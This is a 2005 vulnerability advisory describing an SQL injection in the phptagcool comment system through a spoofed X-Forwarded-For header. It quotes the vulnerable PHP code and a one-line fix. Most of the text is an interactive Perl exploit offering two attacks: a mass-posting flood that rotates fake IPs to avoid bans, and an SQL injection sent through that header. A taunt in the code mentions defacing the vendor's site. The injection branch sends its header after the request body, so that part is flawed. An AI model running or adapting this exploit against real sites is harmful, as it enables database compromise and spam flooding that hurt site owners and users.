##################################################################### advisory #2 "phptagcool sql injection" $ author: megabyte $ contact:
[email protected] [email protected] [email protected] $ date: aug 24 2005 $ website: http://mbytesecurity.org $ risk: high $ vendor url: http://crashcool.com $ affected software: phptagcool v1.0.3 $greetz pandora te amo bb, rootbox for discovering the forwarded-for issue ##################################################################### -= description =phptagcool is an online tag system for leaving your comments ---------------------------------------------------------------------------= vulnerabilities =- | "sql inyection" | the phptagcool software allows to inject sql code spoofing the x-forwarded-for header here its the vulnerable portion of the code in post.php ___________________________________________________________________________ #sacar ip if (isset($_server['http_x_forwarded_for'])) { $ip = $_server['http_x_forwarded_for']; } elseif (isset($_server['http_via'])) { $ip = $_server['http_via']; }elseif (isset($_server['remote_addr'])) { $ip = $_server['remote_addr']; } else { $ip = "x.x.x.x"; } #comprobamos si el user esta baneado #conectamos con la db $conexion=mysql_connect($host,$usuario,$contrasenya); #seleccionamos la db mysql_select_db($base,$conexion); $consulta2=mysql_query("select * from $t_ban where ip='$ip'" ,$conexion); ____________________________________________________________________________ so if we fake the x-forwarded-for with our own value,instead of the ip address we can inject sql code $consulta2=mysql_query("select * from $t_ban where ip='here i can inject'"
- | exploit | you can use any man in the middle software to intercept and edit the http headers such as achilles. but here its the exploit that allows 2 type of attacks,flood and sql injection #!/usr/bin/perl ## phptagcool zatueritor 1.0 ## copyright: megabyte www.mbytesecurity.org ## greetz: rootbox for discovering the forwarded-for issue ## te amo pandora ## crashcool,fuiste defaceado por un bug de tu propia programacion,ahora que inventaras? use io::socket; $x = 0; print q( phptagcool zatueritor 1.0 by megabyte ); print q(host |sin http://www.| ); $host = <stdin>; chop ($host); print q(ruta |ejemplo. /phptagcool/ o /| ); $pth = <stdin>; chop ($pth); print q(tipo de atake |1 = posteo masivo, 2 = injeccion sql| ); $type = <stdin>; chop ($type); ## the flood attack if($type == 1){ while($x != 255) { $nick = "nick=megabyte"; ## we generate our own ip address so we won't be banned :) $ip = "127.0.0" . "$x"; $postit = "$nick"."&url=http%3a%2f%2fwww.mbytesecurity.org&mensaje=floodinglametag&submit=en viar";
$lrg = length $postit; my $sock = new io::socket::inet ( peeraddr => "$host", peerport => "80", proto => "tcp", ); die "\nno se pudo conectar :( $!\n" unless $sock; ## we fake the x-forwarded-for header,so we can post with multiple ip's print $sock "post $pth"."mensajes.php http/1.1\n"; print $sock "host: $host\n"; print $sock "accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.mspowerpoint, application/msword, */*\n"; print $sock "referer: $host\n"; print $sock "accept-language: en-us\n"; print $sock "content-type: application/x-www-form-urlencoded\n"; print $sock "accept-encoding: gzip, deflate\n"; print $sock "user-agent: mozilla/5.0 (beos; u; beos x.6; en-us; rv:1.7.8) gecko/20050511 firefox/1.0.4\n"; print $sock "x-forwarded-for: $ip\n"; print $sock "connection: keep-alive\n"; print $sock "cache-control: no-cache\n"; print $sock "content-length: $lrg\n\n"; print $sock "$postit\n"; close($sock); syswrite stdout, "."; $x++; } ## the sql injection attack :) } elsif ($type == 2){ print q(inyeccion a ejecutar ejemplo |myip,some sql here| ); $sql = <stdin>; chop ($sql);
my $sock = new io::socket::inet (
peeraddr => "$host", peerport => "80", proto => "tcp", ); die "\nno se pudo conectar :( $!\n" unless $sock; print $sock "post $pth"."mensajes.php http/1.1\n"; print $sock "host: $host\n"; print $sock "accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,im age/png,*/*;q=0.5\n"; print $sock "referer: $host\n"; print $sock "accept-language: en-us\n"; print $sock "content-type: application/x-www-form-urlencoded\n"; print $sock "accept-encoding: gzip, deflate\n"; print $sock "user-agent: mozilla/5.0 (beos; u; beos x.6; en-us; rv:1.7.8) gecko/20050511 firefox/1.0.4\n"; print $sock "connection: keep-alive\n"; print $sock "cache-control: no-cache\n"; print $sock "content-length: $lrg\n\n"; print $sock "x-forwarded-for: $sql\n"; close($sock); }else{ die "solo hay 2 opciones imbecil\n"; } ------------------------------------------------------= how to fix =filter the http_x_forwarded_for -= contact =megabyte http://mbytesecurity.org el dios de la red saludos a pandora mi bb zeus,cairo,redpoint,x0p0x and all lame band